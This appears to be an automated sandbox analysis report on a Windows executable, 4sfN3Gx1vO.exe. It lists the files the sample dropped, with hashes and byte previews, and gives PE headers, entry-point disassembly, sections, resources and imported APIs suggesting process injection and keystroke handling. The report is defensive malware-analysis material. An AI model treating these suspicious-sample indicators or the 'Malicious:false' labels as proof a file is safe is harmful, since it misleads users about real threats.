                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\4sfN3Gx1vO.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):15008
                                              Entropy (8bit):7.580677798306826
                                              Encrypted:false
                                              SSDEEP:384:M9/RwgFdNQgZsxLOxw37junLf4LgS/mchHoboAfJlUYd9GpL:MR/fQgOOQfgUr3hIcADBqpL
                                              MD5:83386E8A3E3CF1EEF6C2B14FBCF1EFAB
                                              SHA1:D531F78F2D065C01A278FE50B632CC8B501A792A
                                              SHA-256:B111047B56976E8DBDECCFBC73ECC56AB93032D1421E808CEBD87F93156C2BA3
                                              SHA-512:C68EFA7352E9ACAC213C513B6E5AA91EC5F53D4EF20F77546DF40F1732212FAFE874417DBF67656A3C0194D50574A74BFDFC562578E94CBD28D3F55A756F27ED
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                              Process:C:\Users\user\Desktop\4sfN3Gx1vO.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):289792
                                              Entropy (8bit):7.993190191716649
                                              Encrypted:true
                                              SSDEEP:6144:a0SXLhhr1R/pg26M0pvAxOJlw8gavVC7UvPS5pFKvQwXjlnUaAbEqV0c6w:a0SlhJRRRR0eoXw8ukCn5K2aqJ09w
                                              MD5:22BABDA68A3954AA10B0B0281E3AC687
                                              SHA1:63B04C48CE1E3A8222D2A86A767EAEC6584515F5
                                              SHA-256:83E0D0F4ECC101A16194F7232E7BBDCA84F70262BEB3C573435E7579C3748BFE
                                              SHA-512:4CF9562C1ECC6086C6F8AAF6247FE5E67BA18CD7BDEE442A0F98EEB90360CDA80FB4E9181DD1113A7611ACB9200211DF46A253809E0C5534964FA7C1423638F4
                                              Malicious:false
                                              Reputation:low
                                              Preview:...0SMUE19SM.X9.SCYPS0P.UE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS.PMUK*.]M.Q...R..q.X9>u5GV4?W5xZY=-6$sR5m'0[.:#...j.>,=5}=]GqE59SM6X!81.~97..0*.xU^.W...X4.C...l-2./....8?.j: 1m3W.MUE59SM6..98.BXP>...UE59SM6X.9:RHX[S0.IUE59SM6XX.,SCY@S0P=QE59.M6HX98QCYVS0PMUE5?SM6XX98S3]PS2PMUE59QMv.X9(SCIPS0P]UE%9SM6XX)8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XvM]+7YPSt.IUE%9SMl\X9(SCYPS0PMUE59SM.XXY8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM
                                              Process:C:\Users\user\Desktop\4sfN3Gx1vO.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):289792
                                              Entropy (8bit):7.993190191716649
                                              Encrypted:true
                                              SSDEEP:6144:a0SXLhhr1R/pg26M0pvAxOJlw8gavVC7UvPS5pFKvQwXjlnUaAbEqV0c6w:a0SlhJRRRR0eoXw8ukCn5K2aqJ09w
                                              MD5:22BABDA68A3954AA10B0B0281E3AC687
                                              SHA1:63B04C48CE1E3A8222D2A86A767EAEC6584515F5
                                              SHA-256:83E0D0F4ECC101A16194F7232E7BBDCA84F70262BEB3C573435E7579C3748BFE
                                              SHA-512:4CF9562C1ECC6086C6F8AAF6247FE5E67BA18CD7BDEE442A0F98EEB90360CDA80FB4E9181DD1113A7611ACB9200211DF46A253809E0C5534964FA7C1423638F4
                                              Malicious:false
                                              Preview:...0SMUE19SM.X9.SCYPS0P.UE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS.PMUK*.]M.Q...R..q.X9>u5GV4?W5xZY=-6$sR5m'0[.:#...j.>,=5}=]GqE59SM6X!81.~97..0*.xU^.W...X4.C...l-2./....8?.j: 1m3W.MUE59SM6..98.BXP>...UE59SM6X.9:RHX[S0.IUE59SM6XX.,SCY@S0P=QE59.M6HX98QCYVS0PMUE5?SM6XX98S3]PS2PMUE59QMv.X9(SCIPS0P]UE%9SM6XX)8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XvM]+7YPSt.IUE%9SMl\X9(SCYPS0PMUE59SM.XXY8SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM6XX98SCYPS0PMUE59SM
                                              Process:C:\Users\user\Desktop\4sfN3Gx1vO.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):172054
                                              Entropy (8bit):3.180914922088335
                                              Encrypted:false
                                              SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fv:iaNhCHcZLfaDfJQNy7Ha7CkJ0FZIklX
                                              MD5:3A122E0B0905AB3F0B785723FBFD51AD
                                              SHA1:41D84A5806FE3F8E66FA30FBDB6837B086250A56
                                              SHA-256:11BA5A39B30D7D81C98E3E5AF3761F4F27C0CC5B0B3F0B6F60CDA4735F651C9E
                                              SHA-512:5D5670A332BA5C0D09178327C25088230EC9656B394BB5FB13696E7495D306F7D1CEF872083571750EE806853DA7E13AF98D2BC6069BD4E4E6C5131C2C49FF9A
                                              Malicious:false
                                              Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.130152906080185
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:4sfN3Gx1vO.exe
                                              File size:1'245'696 bytes
                                              MD5:f6f040a290cc9c41a1b07307f12310e5
                                              SHA1:c34b80ea358bbddc007a7e9054f9d71eee00799f
                                              SHA256:e1c5b7a7fa4b308e50aa7061dd1e691cd253f63dc99745977164ec5d5311047a
                                              SHA512:e999cb475da64e389c2cd05278b207b3cd79a52eb98b28b9c92f08a564657cbd42f60254dd091a3199f517067330fe16af4c46abd54207209094da361e9d78e3
                                              SSDEEP:24576:yqDEvCTbMWu7rQYlBQcBiT6rprG8aTI6Cds1SZvvE2X:yTvC/MTQYxsWR7aTI6CdqsX
                                              TLSH:6845CF0273C1C022FF9B92734B5AF6515BBC69260123E61F13A81D7ABE701B1563E7A3
                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                              Icon Hash:aaf3e3e3938382a0
                                              Entrypoint:0x420577
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x67689E8E [Sun Dec 22 23:19:42 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:948cc502fe9226992dce9417f952fce3
                                              Instruction
                                              call 00007FD521496693h
                                              jmp 00007FD521495F9Fh
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              call 00007FD52149617Dh
                                              mov dword ptr [esi], 0049FDF0h
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 0049FDF8h
                                              mov dword ptr [ecx], 0049FDF0h
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              call 00007FD52149614Ah
                                              mov dword ptr [esi], 0049FE0Ch
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 0049FE14h
                                              mov dword ptr [ecx], 0049FE0Ch
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              mov esi, ecx
                                              lea eax, dword ptr [esi+04h]
                                              mov dword ptr [esi], 0049FDD0h
                                              and dword ptr [eax], 00000000h
                                              and dword ptr [eax+04h], 00000000h
                                              push eax
                                              mov eax, dword ptr [ebp+08h]
                                              add eax, 04h
                                              push eax
                                              call 00007FD521498D3Dh
                                              pop ecx
                                              pop ecx
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              lea eax, dword ptr [ecx+04h]
                                              mov dword ptr [ecx], 0049FDD0h
                                              push eax
                                              call 00007FD521498D88h
                                              pop ecx
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              mov esi, ecx
                                              lea eax, dword ptr [esi+04h]
                                              mov dword ptr [esi], 0049FDD0h
                                              push eax
                                              call 00007FD521498D71h
                                              test byte ptr [ebp+08h], 00000001h
                                              pop ecx
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5971c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x12e0000x7594.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0xd40000x5971c0x59800c476d4c9f0f7f9530f3c5cb713ef55beFalse0.9266186932611732data7.891352840206034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x12e0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                              RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                              RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                              RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                              RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                              RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                              RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                              RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                              RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                              RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                              RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                              RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                              RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                              RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                              RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                              RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                              RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                              RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                              RT_RCDATA0xdc7b80x509e4data1.0003361476869406
                                              RT_GROUP_ICON0x12d19c0x76dataEnglishGreat Britain0.6610169491525424
                                              RT_GROUP_ICON0x12d2140x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0x12d2280x14dataEnglishGreat Britain1.15
                                              RT_GROUP_ICON0x12d23c0x14dataEnglishGreat Britain1.25
                                              RT_VERSION0x12d2500xdcdataEnglishGreat Britain0.6181818181818182
                                              RT_MANIFEST0x12d32c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                              DLLImport
                                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                              PSAPI.DLLGetProcessMemoryInfo
                                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                              UxTheme.dllIsThemeActive
                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                              GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                              SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                              OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
